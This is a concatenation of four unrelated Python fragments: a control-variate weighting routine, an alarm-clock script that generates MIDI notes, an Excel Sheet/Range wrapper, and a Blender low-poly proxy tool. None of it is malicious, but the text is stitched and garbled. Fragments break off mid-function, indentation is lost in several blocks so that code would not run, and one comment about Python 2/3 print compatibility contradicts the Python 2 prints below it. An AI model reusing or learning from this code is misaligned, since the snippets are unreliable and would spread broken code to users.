    cf = pkg.diag(F) * cov[1:, 0]
    return CF, cf
def get_control_variate_weights(cov):
    r"""
    Weights used by the control variate estimator when the low-fidelity
    means are known exactly.

    Parameters
    ----------
    cov : np.ndarray (nmodels,nmodels)
        The estimated covariance between each model.

    Returns
    -------
    weights : np.ndarray (nmodels-1)
        The control variate weights
    """
    lf_cov = cov[1:, 1:]          # covariance among the low-fidelity models
    hf_cross = cov[0, 1:]         # covariance of each LF model with the HF model
    return -np.linalg.solve(lf_cov, hf_cross)
def get_approximate_control_variate_weights(cov, nsample_ratios,
get_discrepancy_covariances):
r"""
Get the weights used by the approximate control variate estimator.
Parameters
----------
cov : np.ndarray (nmodels,nmodels)
The estimated covariance between each model.
nsample_ratios : iterable (nmodels-1)
The sample ratioss :math:`r_\alpha>1` for each low-fidelity model
get_discrepancy_covariances : callable
Function with signature get_discrepancy_covariances(cov,nsample_ratios)
which returns the covariances between the discrepancies betweem the
low-fidelity models and their approximated mean.
Returns
-------
weights : np.ndarray (nmodels-1)
The control variate | |
'''
MIT License
Copyright (c) 2016 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
'''
capriccio.py
Created by <NAME> on 2016-08-12.
https://yuhuili.com
https://github.com/yuhuili
'''
import pyglet
import threading
import time
import datetime
import sys, getopt
import random
from mingus.midi import fluidsynth
from os.path import isfile
class Alarm(object):
    '''
    A simple alarm clock written in Python.

    Example:
    import capriccio
    t = datetime.datetime.now() + datetime.timedelta(seconds=10)
    a = Alarm(t, "alarm.mp3")
    # The above plays alarm.mp3, or you could use Alarm(t, 0, is_random=True)
    # to let capriccio generate note sequences in real time given an
    # instrument number.
    # Make sure a is retained, or else when the main thread ends, this alarm
    # will also be released.
    a.destroy() # Stop the alarm clock.
    '''
    def __init__(self, timestamp, tune, is_random = False):
        '''
        Initialize an alarm clock.

        Args:
            timestamp (datetime): The timestamp on which the alarm will sound.
            tune (str): The filename of the alarm audio file, or if
                is_random==True, the instrument number.
            is_random (bool): if the sound generator should be used instead of
                an audio file.
        '''
        # BUGFIX: must start as False.  destroy() sets it to True to stop the
        # alarm; the original initialized it to True, which made the volume
        # fade-in loop in __play_sound__ exit immediately.
        self.should_stop = False
        now = datetime.datetime.now()
        delay = (timestamp - now).total_seconds()
        # print(...) with a single argument is valid in both Python 2 and 3.
        if delay > 0:
            print("Scheduling an alarm clock at %s, which is in %.1f seconds." % (timestamp, delay))
        else:
            print("Scheduling an alarm clock at %s, which is %.1f seconds earlier than current time %s. This alarm is not set." % (timestamp, delay, now))
            # Past timestamps never schedule a timer; self.alarm_thread is
            # intentionally left unset.
            return
        if is_random == False:
            self.alarm_thread = threading.Timer(delay, self.__play_sound__, (tune,))
        else:
            self.alarm_thread = threading.Timer(delay, self.__generate_sound__, (int(tune),))
        self.alarm_thread.start()

    def destroy(self):
        '''
        Stop the alarm clock, whether or not it has actually occurred.
        Safe to call even when no timer was scheduled.
        '''
        self.should_stop = True
        if hasattr(self, 'p'):
            self.p.delete()
        if hasattr(self, 'sg'):
            self.sg.stop()
        # BUGFIX: guard the timer access — a past timestamp means __init__
        # returned before creating self.alarm_thread, and the original code
        # raised AttributeError here.
        if hasattr(self, 'alarm_thread'):
            self.alarm_thread.cancel()
            self.alarm_thread.join()

    def __generate_sound__(self, instrument):
        '''
        Play generated note sequences on a given instrument.

        Args:
            instrument (int): The instrument used by SoundGen.
                (Not identical to the GM 1 Sound Set.)
        '''
        self.sg = SoundGen(instrument)
        self.sg.play()

    def __play_sound__(self, tune):
        '''
        Play the audio file continuously, until the alarm is cancelled by
        calling destroy().

        Args:
            tune (str): The filename of the alarm audio file.
        '''
        music = pyglet.media.load(tune)
        sg = pyglet.media.SourceGroup(music.audio_format, None)
        sg.loop = True
        sg.queue(music)
        self.p = pyglet.media.Player()
        self.p.queue(sg)
        self.p.play()
        # Fade the volume in from 0 to 1 (~4 s) unless stopped first.
        v = float(0)
        while v < 1 and self.should_stop == False:
            v += 0.05
            self.p.volume = v
            time.sleep(0.2)
class SoundGen(object):
    '''
    Synthesize note sequences with mingus and fluidsynth.

    play() performs a weighted random walk over a C-major note table
    (see __next_note__) until stop() is called.
    '''
    # MIDI note numbers around middle C (60).  L = low, H = high
    kNoteNone = int(-1)  # sentinel: "no previous note"
    kNoteLB = int(59)
    kNoteC = int(60)
    kNoteCs = kNoteDf = int(61)
    kNoteD = int(62)
    kNoteDs = kNoteEf = int(63)
    kNoteE = int(64)
    kNoteF = int(65)
    kNoteFs = kNoteGf = int(66)
    kNoteG = int(67)
    kNoteGs = kNoteAf = int(68)
    kNoteA = int(69)
    kNoteAs = kNoteBf = int(70)
    kNoteB = int(71)
    kNoteHC = int(72)
    kNoteHCs = kNoteHDf = int(73)
    kNoteHD = int(74)
    kNoteHDs = kNoteHEf = int(75)
    kNoteHE = int(76)
    # Weight applied to the main candidate lists in __next_note__'s
    # transition tables.
    kSameNoteMultiplier = 3
    OneBeatLength = 0.5 # 1 beat is _ seconds
    def __init__(self, instrument = 0):
        '''
        Map a small instrument id onto a General-MIDI patch number plus a
        beat length in seconds; unknown ids fall back to Electric Grand
        Piano.
        '''
        self.should_stop = False
        if instrument == 1: # Pipe: Pan Flute
            self.__set_instrument__(75, 0.5)
        elif instrument == 2: # Brass: French Horn
            self.__set_instrument__(60, 0.3)
        elif instrument == 3: # Synth Lead: Lead 8 (bass + lead)
            self.__set_instrument__(87, 0.2)
        elif instrument == 4: # Synth Effects: FX 3 (crystal)
            self.__set_instrument__(98, 0.3)
        elif instrument == 5: # Percussive: Steel Drums
            self.__set_instrument__(114, 0.2)
        elif instrument == 6: # Sound Effects: Bird Tweet (calm, but probably not a good wake-up alarm)
            self.__set_instrument__(123, 0.5)
        elif instrument == 7: # Sound Effects: Gunshot (ANNOYING~)
            self.__set_instrument__(127, 0.2)
        elif instrument == 8: # Ensemble: String Ensemble 2
            self.__set_instrument__(49, 0.4)
        elif instrument == 9: # Pipe: Piccolo
            self.__set_instrument__(72, 0.4)
        else: # Default: Piano: Electric Grand Piano
            self.__set_instrument__(2, 0.3)
    def __set_instrument__(self, instrument, beat_length):
        # Store the GM patch number and per-beat duration used by play().
        self.instrument = instrument
        self.OneBeatLength = beat_length
    def play(self):
        '''
        Generate and play notes until stop() is called.

        NOTE(review): the soundfont path and the 'alsa' driver are
        hard-coded; this only works where FluidR3_GM.sf2 exists at that
        path — confirm for the target system.
        '''
        fluidsynth.init('/usr/share/sounds/sf2/FluidR3_GM.sf2','alsa')
        fluidsynth.set_instrument(0, self.instrument) # Use channel 0
        self.previous = int(SoundGen.kNoteNone) # Previously played note
        self.shift = random.randint(-10, 5) # Allow the key to be shifted
        beat_tracker = int(0) # 4/4 time.
        while self.should_stop == False:
            # Velocity: accent the first beat, semi-accent the third,
            # soften off-beats; everything else is medium.
            v = random.randint(65,75)
            if beat_tracker % 8 == 0:
                # First beat, strong
                v = random.randint(85,95)
            elif (beat_tracker - 4) % 8 == 0:
                # Third beat, semi-strong
                v = random.randint(75,85)
            elif beat_tracker % 2 == 1:
                # Off-beat, very soft
                v = random.randint(55,65)
            # Random note length
            possible_lengths = [4] + [2] * 10 + [1] * 4 # 4 is 2 beats, 2 is 1 beat, 1 is half-beat
            if beat_tracker % 2 == 1: # avoid non-half-beat if currently in half-beat
                possible_lengths += [1] * 20 # Add weight to half-beat
            length = random.choice(possible_lengths)
            beat_tracker+=length
            # Release the previous note before starting the next one.
            if self.previous != SoundGen.kNoteNone:
                fluidsynth.stop_Note(self.previous+self.shift, 0)
            self.previous = SoundGen.__next_note__(self.previous)
            fluidsynth.play_Note(self.previous+self.shift,0,v);
            time.sleep(length * self.OneBeatLength)
    def stop(self):
        '''
        Ask play() to exit and silence the current note immediately.

        NOTE(review): assumes play() has already run at least once —
        self.previous/self.shift are created there.
        '''
        self.should_stop = True;
        if self.previous != SoundGen.kNoteNone: # Won't actually kill SoundGen just yet, but at least will stop the sound instantly.
            fluidsynth.stop_Note(self.previous+self.shift, 0)
    @staticmethod
    def __next_note__(previous):
        '''
        Pick the next note via a weighted random choice conditioned on
        the previously played note (first-order Markov walk over the
        C-major scale).
        '''
        # I know, tons of magic numbers and so difficult to read. Will fix.
        if (previous == SoundGen.kNoteNone):
            choices = [SoundGen.kNoteC, SoundGen.kNoteD, SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteA, SoundGen.kNoteB, SoundGen.kNoteC]
        else:
            if (previous == SoundGen.kNoteLB):
                choices = [SoundGen.kNoteC] * 10 + [SoundGen.kNoteD] + [SoundGen.kNoteG]
            elif (previous == SoundGen.kNoteC):
                choices = [SoundGen.kNoteC, SoundGen.kNoteD, SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG] + [SoundGen.kNoteE] * 2 + [SoundGen.kNoteG] * 3
            elif (previous == SoundGen.kNoteD):
                choices = [SoundGen.kNoteC, SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteA] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteC, SoundGen.kNoteG] * 2 + [SoundGen.kNoteD]
            elif (previous == SoundGen.kNoteE):
                choices = [SoundGen.kNoteC, SoundGen.kNoteD, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteHC] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteC] * 2 + [SoundGen.kNoteG] * 2 + [SoundGen.kNoteE]
            elif (previous == SoundGen.kNoteF):
                choices = [SoundGen.kNoteC, SoundGen.kNoteD, SoundGen.kNoteE, SoundGen.kNoteG, SoundGen.kNoteA, SoundGen.kNoteHC] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteF]
            elif (previous == SoundGen.kNoteG):
                choices = [SoundGen.kNoteC, SoundGen.kNoteD, SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteA, SoundGen.kNoteB, SoundGen.kNoteHC, SoundGen.kNoteHD, SoundGen.kNoteHE] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteC] * 2 + [SoundGen.kNoteE] * 2 + [SoundGen.kNoteG]
            elif (previous == SoundGen.kNoteA):
                choices = [SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteB, SoundGen.kNoteHC, SoundGen.kNoteHD, SoundGen.kNoteHE] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteHC] * 2 + [SoundGen.kNoteA]
            elif (previous == SoundGen.kNoteB):
                choices = [SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteA, SoundGen.kNoteHC, SoundGen.kNoteHD] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteG] * 2 + [SoundGen.kNoteHC] * 2 + [SoundGen.kNoteB]
            elif (previous == SoundGen.kNoteHC):
                choices = [SoundGen.kNoteE, SoundGen.kNoteF, SoundGen.kNoteG, SoundGen.kNoteA, SoundGen.kNoteB, SoundGen.kNoteHD, SoundGen.kNoteHE] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteG] * 3 + [SoundGen.kNoteE] * 3 + [SoundGen.kNoteHC]
            elif (previous == SoundGen.kNoteHD):
                choices = [SoundGen.kNoteG, SoundGen.kNoteB, SoundGen.kNoteHC, SoundGen.kNoteHE] * SoundGen.kSameNoteMultiplier + [SoundGen.kNoteB] * 2 + [SoundGen.kNoteG] * 2 + [SoundGen.kNoteHD]
            elif (previous == SoundGen.kNoteHE):
                choices = [SoundGen.kNoteG, SoundGen.kNoteHC] * SoundGen.kSameNoteMultiplier * 3 + [SoundGen.kNoteHC] * 2 + [SoundGen.kNoteG] * 2 + [SoundGen.kNoteHE]
        return random.choice(choices)
def main(argv):
try:
opts, args = getopt.getopt(argv,"hd:t:i:",["delay=","tune=","instrument="])
except getopt.GetoptError:
print_usage()
sys.exit(1)
for opt, arg in opts:
if opt == "-h":
print_usage()
sys.exit(0)
elif opt in ("-d", "--delay"):
try:
float(arg)
except ValueError:
print "Illegal delay value. Expecting a positive float value, got %s" % arg
sys.exit(3)
if float(arg)<0:
print "Illegal delay value. Expecting a positive float value, got %s" % arg
sys.exit(4)
d = datetime.datetime.now()+datetime.timedelta(seconds=float(arg))
elif opt in ("-t", "--tune"):
if not isfile(arg):
print "Tune file %s does not exist." % arg
sys.exit(5)
t = arg
elif opt | |
xlplatform.get_worksheet_name(self.xl_sheet)
@name.setter
def name(self, value):
    # Rename the Sheet via the platform backend.
    xlplatform.set_worksheet_name(self.xl_sheet, value)
@property
def index(self):
    """Returns the index of the Sheet (as reported by the platform backend)."""
    return xlplatform.get_worksheet_index(self.xl_sheet)
@classmethod
def active(cls, wkb=None):
    """Returns the active Sheet. Use like so: ``Sheet.active()``"""
    xl_workbook = Workbook.get_xl_workbook(wkb)
    # Resolve the active sheet first, then wrap it by name.
    xl_active = xlplatform.get_active_sheet(xl_workbook)
    active_name = xlplatform.get_worksheet_name(xl_active)
    return cls(active_name, wkb)
@classmethod
def add(cls, name=None, before=None, after=None, wkb=None):
    """
    .. versionadded:: 0.2.3
    Creates a new worksheet: the new worksheet becomes the active sheet. If neither ``before`` nor
    ``after`` is specified, the new Sheet will be placed at the end.
    Arguments
    ---------
    name : str, default None
        Sheet name, defaults to Excel standard name
    before : str or int, default None
        Sheet name or index
    after : str or int, default None
        Sheet name or index
    Returns
    -------
    Sheet object
    Examples
    --------
    >>> Sheet.add()  # Place at end with default name
    >>> Sheet.add('NewSheet', before='Sheet1')  # Include name and position
    >>> new_sheet = Sheet.add(after=3)
    >>> new_sheet.index
    4
    """
    xl_workbook = Workbook.get_xl_workbook(wkb)
    if before is None and after is None:
        # BUGFIX: count and wrap the last sheet in the *requested* workbook.
        # The original called Sheet(Sheet.count()) without wkb, silently
        # using the current workbook when a different wkb was passed.
        after = Sheet(Sheet.count(wkb=wkb), wkb=wkb)
    elif before:
        before = Sheet(before, wkb=wkb)
    elif after:
        after = Sheet(after, wkb=wkb)
    if name:
        # BUGFIX: lower both sides of the comparison. The original compared
        # the raw `name` against lowered existing names, so e.g. 'SHEET1'
        # slipped past the duplicate check.
        if name.lower() in [i.name.lower() for i in Sheet.all(wkb=wkb)]:
            raise Exception('That sheet name is already in use.')
        else:
            xl_sheet = xlplatform.add_sheet(xl_workbook, before, after)
            xlplatform.set_worksheet_name(xl_sheet, name)
            return cls(name, wkb)
    else:
        xl_sheet = xlplatform.add_sheet(xl_workbook, before, after)
        return cls(xlplatform.get_worksheet_name(xl_sheet), wkb)
@staticmethod
def count(wkb=None):
    """
    .. versionadded:: 0.2.3
    Counts the number of Sheets.
    Keyword Arguments
    -----------------
    wkb : Workbook object, default Workbook.current()
        Defaults to the Workbook that was instantiated last or set via ``Workbook.set_current()``.
    Examples
    --------
    >>> Sheet.count()
    3
    """
    # Resolve the workbook and delegate directly to the backend.
    return xlplatform.count_worksheets(Workbook.get_xl_workbook(wkb))
@staticmethod
def all(wkb=None):
    """
    .. versionadded:: 0.2.3
    Returns a list with all Sheet objects.
    Keyword Arguments
    -----------------
    wkb : Workbook object, default Workbook.current()
        Defaults to the Workbook that was instantiated last or set via ``Workbook.set_current()``.
    Examples
    --------
    >>> Sheet.all()
    [<Sheet 'Sheet1' of Workbook 'Book1'>, <Sheet 'Sheet2' of Workbook 'Book1'>]
    >>> [i.name.lower() for i in Sheet.all()]
    ['sheet1', 'sheet2']
    >>> [i.autofit() for i in Sheet.all()]
    """
    xl_workbook = Workbook.get_xl_workbook(wkb)
    # Sheet indices are 1-based (see count()).
    n_sheets = xlplatform.count_worksheets(xl_workbook)
    return [Sheet(i, wkb=wkb) for i in range(1, n_sheets + 1)]
def __repr__(self):
    # Same text as before, built with %-formatting instead of str.format.
    workbook_name = xlplatform.get_workbook_name(self.xl_workbook)
    return "<Sheet '%s' of Workbook '%s'>" % (self.name, workbook_name)
class Range(object):
"""
A Range object can be created with the following arguments::
Range('A1') Range('Sheet1', 'A1') Range(1, 'A1')
Range('A1:C3') Range('Sheet1', 'A1:C3') Range(1, 'A1:C3')
Range((1,2))                  Range('Sheet1', (1,2))          Range(1, (1,2))
Range((1,1), (3,3)) Range('Sheet1', (1,1), (3,3)) Range(1, (1,1), (3,3))
Range('NamedRange') Range('Sheet1', 'NamedRange') Range(1, 'NamedRange')
If no worksheet name is provided as first argument (as name or index),
it will take the Range from the active sheet.
You usually want to go for ``Range(...).value`` to get the values (as list of lists).
Arguments
---------
*args :
Definition of sheet (optional) and Range in the above described combinations.
Keyword Arguments
-----------------
asarray : boolean, default False
Returns a NumPy array (atleast_1d) where empty cells are transformed into nan.
index : boolean, default True
Includes the index when setting a Pandas DataFrame or Series.
header : boolean, default True
Includes the column headers when setting a Pandas DataFrame.
atleast_2d : boolean, default False
Returns 2d lists/arrays even if the Range is a Row or Column.
wkb : Workbook object, default Workbook.current()
Defaults to the Workbook that was instantiated last or set via ``Workbook.set_current()``.
"""
def __init__(self, *args, **kwargs):
    """Dispatch the positional-argument combinations documented on the
    class into (sheet_name_or_index, range_address) or explicit
    row1/col1/row2/col2 coordinates, then resolve the backend range.

    NOTE(review): an argument combination matching none of the branches
    below leaves ``sheet_name_or_index``/``range_address`` unassigned and
    raises NameError further down — confirm whether that is intended.
    """
    # Arguments
    if len(args) == 1 and isinstance(args[0], string_types):
        # Range('A1') / Range('A1:C3') / Range('NamedRange')
        sheet_name_or_index = None
        range_address = args[0]
    elif len(args) == 1 and isinstance(args[0], tuple):
        # Range((row, col)) — a single cell by 1-based coordinates.
        sheet_name_or_index = None
        range_address = None
        self.row1 = args[0][0]
        self.col1 = args[0][1]
        self.row2 = self.row1
        self.col2 = self.col1
    elif (len(args) == 2
          and isinstance(args[0], (numbers.Number, string_types))
          and isinstance(args[1], string_types)):
        # Range(sheet, 'A1:C3')
        sheet_name_or_index = args[0]
        range_address = args[1]
    elif (len(args) == 2
          and isinstance(args[0], (numbers.Number, string_types))
          and isinstance(args[1], tuple)):
        # Range(sheet, (row, col))
        sheet_name_or_index = args[0]
        range_address = None
        self.row1 = args[1][0]
        self.col1 = args[1][1]
        self.row2 = self.row1
        self.col2 = self.col1
    elif len(args) == 2 and isinstance(args[0], tuple):
        # Range((row1, col1), (row2, col2))
        sheet_name_or_index = None
        range_address = None
        self.row1 = args[0][0]
        self.col1 = args[0][1]
        self.row2 = args[1][0]
        self.col2 = args[1][1]
    elif len(args) == 3:
        # Range(sheet, (row1, col1), (row2, col2))
        sheet_name_or_index = args[0]
        range_address = None
        self.row1 = args[1][0]
        self.col1 = args[1][1]
        self.row2 = args[2][0]
        self.col2 = args[2][1]
    # Keyword Arguments
    self.kwargs = kwargs
    self.workbook = kwargs.get('wkb', None)
    if self.workbook is None and xlplatform.get_xl_workbook_current() is None:
        raise NameError('You must first instantiate a Workbook object.')
    elif self.workbook is None:
        self.xl_workbook = xlplatform.get_xl_workbook_current()
    else:
        self.xl_workbook = self.workbook.xl_workbook
    self.index = kwargs.get('index', True)  # Set DataFrame with index
    self.header = kwargs.get('header', True)  # Set DataFrame with header
    self.asarray = kwargs.get('asarray', False)  # Return Data as NumPy Array
    self.strict = kwargs.get('strict', False)  # Stop table/horizontal/vertical at empty cells that contain formulas
    self.atleast_2d = kwargs.get('atleast_2d', False)  # Force data to be list of list or a 2d numpy array
    # Get sheet
    if sheet_name_or_index:
        self.xl_sheet = xlplatform.get_worksheet(self.xl_workbook, sheet_name_or_index)
    else:
        self.xl_sheet = xlplatform.get_active_sheet(self.xl_workbook)
    # Get xl_range object
    if range_address:
        # A textual address overrides any coordinates: derive row/col
        # bounds from the backend.
        self.row1 = xlplatform.get_first_row(self.xl_sheet, range_address)
        self.col1 = xlplatform.get_first_column(self.xl_sheet, range_address)
        self.row2 = self.row1 + xlplatform.count_rows(self.xl_sheet, range_address) - 1
        self.col2 = self.col1 + xlplatform.count_columns(self.xl_sheet, range_address) - 1
    self.xl_range = xlplatform.get_range_from_indices(self.xl_sheet, self.row1, self.col1, self.row2, self.col2)
    # Iterator object that returns cell coordinates: (1, 1), (1, 2) etc.
    self.cell_iterator = itertools.product(xrange(self.row1, self.row2 + 1), xrange(self.col1, self.col2 + 1))
def __iter__(self):
    # The Range is its own iterator; iteration state lives in
    # self.cell_iterator (created in __init__).
    return self

def __next__(self):
    # StopIteration raised by itertools.product
    # Each step yields a new single-cell Range on the same sheet.
    return Range(xlplatform.get_worksheet_name(self.xl_sheet), next(self.cell_iterator), **self.kwargs)

# PY2 compatibility
next = __next__
def is_cell(self):
    """
    .. versionadded:: 0.1.1
    Returns ``True`` if the Range consists of a single Cell otherwise ``False``.
    """
    # Single cell: both dimensions collapse to one row and one column.
    return self.row1 == self.row2 and self.col1 == self.col2
def is_row(self):
    """
    .. versionadded:: 0.1.1
    Returns ``True`` if the Range consists of a single Row otherwise ``False``.
    """
    # One row, more than one column.
    return self.row1 == self.row2 and self.col1 != self.col2
def is_column(self):
    """
    .. versionadded:: 0.1.1
    Returns ``True`` if the Range consists of a single Column otherwise ``False``.
    """
    # More than one row, exactly one column.
    return self.row1 != self.row2 and self.col1 == self.col2
def is_table(self):
    """
    .. versionadded:: 0.1.1
    Returns ``True`` if the Range consists of a 2d array otherwise ``False``.
    """
    # Multiple rows and multiple columns.
    return self.row1 != self.row2 and self.col1 != self.col2
@property
def shape(self):
    """
    .. versionadded:: 0.3.0
    Tuple of Range dimensions.
    """
    n_rows = self.row2 - self.row1 + 1
    n_cols = self.col2 - self.col1 + 1
    return n_rows, n_cols
@property
def size(self):
    """
    .. versionadded:: 0.3.0
    Number of elements in the Range.
    """
    n_rows, n_cols = self.shape
    return n_rows * n_cols
def __len__(self):
    # Length of a Range is its number of rows (first shape dimension).
    return self.shape[0]
@property
def value(self):
    """
    Gets and sets the values for the given Range.
    Returns
    -------
    list or numpy array
        Empty cells are set to ``None``. If ``asarray=True``,
        a numpy array is returned where empty cells are set to ``nan``.
    """
    # TODO: refactor
    if self.is_cell():
        # Clean_xl_data requires and returns a list of list
        data = xlplatform.clean_xl_data([[xlplatform.get_value_from_range(self.xl_range)]])
        if not self.atleast_2d:
            # Unwrap [[x]] -> x for the scalar case.
            data = data[0][0]
    elif self.is_row():
        data = xlplatform.clean_xl_data(xlplatform.get_value_from_range(self.xl_range))
        if not self.atleast_2d:
            # Unwrap [[a, b, ...]] -> [a, b, ...].
            data = data[0]
    elif self.is_column():
        data = xlplatform.clean_xl_data(xlplatform.get_value_from_range(self.xl_range))
        if not self.atleast_2d:
            # Flatten [[a], [b], ...] -> [a, b, ...].
            data = [item for sublist in data for item in sublist]
    else:  # 2d Range, leave as list of list
        data = xlplatform.clean_xl_data(xlplatform.get_value_from_range(self.xl_range))
    # Return as NumPy Array
    if self.asarray:
        # replace None (empty cells) with nan as None produces arrays with dtype=object
        # TODO: easier like this: np.array(my_list, dtype=np.float)
        if data is None:
            data = np.nan
        if (self.is_column() or self.is_row()) and not self.atleast_2d:
            data = [np.nan if x is None else x for x in data]
        elif self.is_table() or self.atleast_2d:
            data = [[np.nan if x is None else x for x in i] for i in data]
        return np.atleast_1d(np.array(data))
    return data
@value.setter
def value(self, data):
# Pandas DataFrame: Turn into NumPy object array with or without Index and Headers
if hasattr(pd, 'DataFrame') and isinstance(data, pd.DataFrame):
if self.index:
data = data.reset_index()
if self.header:
if isinstance(data.columns, pd.MultiIndex):
# Ensure dtype=object because otherwise it may get assigned a string type which sometimes makes
# vstacking return a string array. This would cause values to be truncated and we can't easily
# transform np.nan in string form.
# Python 3 requires zip wrapped | |
<filename>proxy.py
# Copyright (c) 2016-2019, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import os
import bpy
from mathutils import Vector
from .error import *
from .tables import *
from .utils import *
if bpy.app.version < (2,80,0):
from .buttons27 import UseAllBool
else:
from .buttons28 import UseAllBool
#-------------------------------------------------------------
# Make proxy
#-------------------------------------------------------------
def makeProxy1(context, iterations):
    """Create a low-poly proxy of the active object.

    Duplicates the active object, applies an un-subdivide decimate with
    the given number of iterations, copies seams from the original, and
    names the result "<base>_Lod<iterations>".  Returns the proxy object.
    """
    ob = context.object
    bpy.ops.object.duplicate()
    # After duplicate(), the copy is the new active object.
    pxy = context.object
    makeRawProxy(pxy, iterations)
    pxy.name = stripName(ob.name) + ("_Lod%d" % iterations)
    if bpy.app.version < (2,80,0):
        # Blender 2.7x: keep the proxy on the same layers as the original.
        pxy.layers = list(ob.layers)
    insertSeams(ob, pxy)
    print("Low-poly %s created" % pxy.name)
    return pxy
def stripName(string):
    """Strip a trailing "_Mesh" suffix or a Blender ".NNN" duplicate
    suffix from an object name; return the name unchanged otherwise."""
    if string.endswith("_Mesh"):
        return string[:-5]
    has_dup_suffix = (len(string) > 4
                      and string[-4] == "."
                      and string[-3:].isdigit())
    if has_dup_suffix:
        return string[:-4]
    return string
def makeRawProxy(pxy, iterations):
    """Reduce pxy's polygon count in place by applying an UNSUBDIV
    decimate modifier with the given iteration count."""
    mod = pxy.modifiers.new("Proxy", 'DECIMATE')
    mod.decimate_type = 'UNSUBDIV'
    mod.iterations = iterations
    # Bake the modifier into the mesh data immediately.
    bpy.ops.object.modifier_apply(apply_as='DATA', modifier=mod.name)
#-------------------------------------------------------------
# Find polys
#-------------------------------------------------------------
def findHumanAndProxy(context):
    """Return (human, proxy): the first two mesh objects in the scene,
    ordered so the one with more vertices is the human."""
    hum = pxy = None
    for ob in getSceneObjects(context):
        if ob.type != 'MESH':
            continue
        if hum is None:
            hum = ob
            continue
        pxy = ob
        if len(pxy.data.vertices) > len(hum.data.vertices):
            # The denser mesh is taken to be the human.
            hum, pxy = pxy, hum
    return hum, pxy
def assocPxyHumVerts(hum, pxy):
    """Associate each proxy vertex with the human vertex at (almost) the
    same location.

    Returns (pxyHumVerts, humPxyVerts): proxy-index -> human-index, and
    the inverse map with None for human vertices that have no proxy twin.

    NOTE(review): assumes every proxy vertex coincides (within 1e-4) with
    some human vertex — otherwise hverts is exhausted and indexing fails.
    Also relies on sorting (Vector, int) tuples; confirm mathutils.Vector
    ordering is well-defined for the Blender version in use.
    """
    pxyHumVerts = {}
    # Sort both vertex lists by coordinate so they can be merged in one
    # forward sweep (two-pointer style).
    hverts = [(hv.co, hv.index) for hv in hum.data.vertices]
    hverts.sort()
    pverts = [(pv.co, pv.index) for pv in pxy.data.vertices]
    pverts.sort()
    for pco,pvn in pverts:
        hco,hvn = hverts[0]
        # Advance through human vertices until one matches this proxy
        # vertex.  (The repeated slicing is O(n^2) in the worst case.)
        while (pco-hco).length > 1e-4:
            hverts = hverts[1:]
            hco,hvn = hverts[0]
        pxyHumVerts[pvn] = hvn
    # Invert the map; human vertices without a proxy partner stay None.
    humPxyVerts = dict([(hvn,None) for hvn in range(len(hum.data.vertices))])
    for pvn,hvn in pxyHumVerts.items():
        humPxyVerts[hvn] = pvn
    return pxyHumVerts, humPxyVerts
def findPolys(context):
    """Copy seam edges from the human mesh onto the proxy mesh.

    For every seam edge of the human whose endpoints are missing on the
    proxy, new proxy vertices and edges are created at the human vertex
    positions.

    NOTE(review): everything after the bare ``return`` below is
    unreachable — it looks like an abandoned face-matching experiment
    that was kept for reference.
    """
    hum,pxy = findHumanAndProxy(context)
    print(hum, pxy)
    humFaceVerts,humVertFaces = getVertFaces(hum)
    pxyFaceVerts,pxyVertFaces = getVertFaces(pxy)
    pxyHumVerts,humPxyVerts = assocPxyHumVerts(hum, pxy)
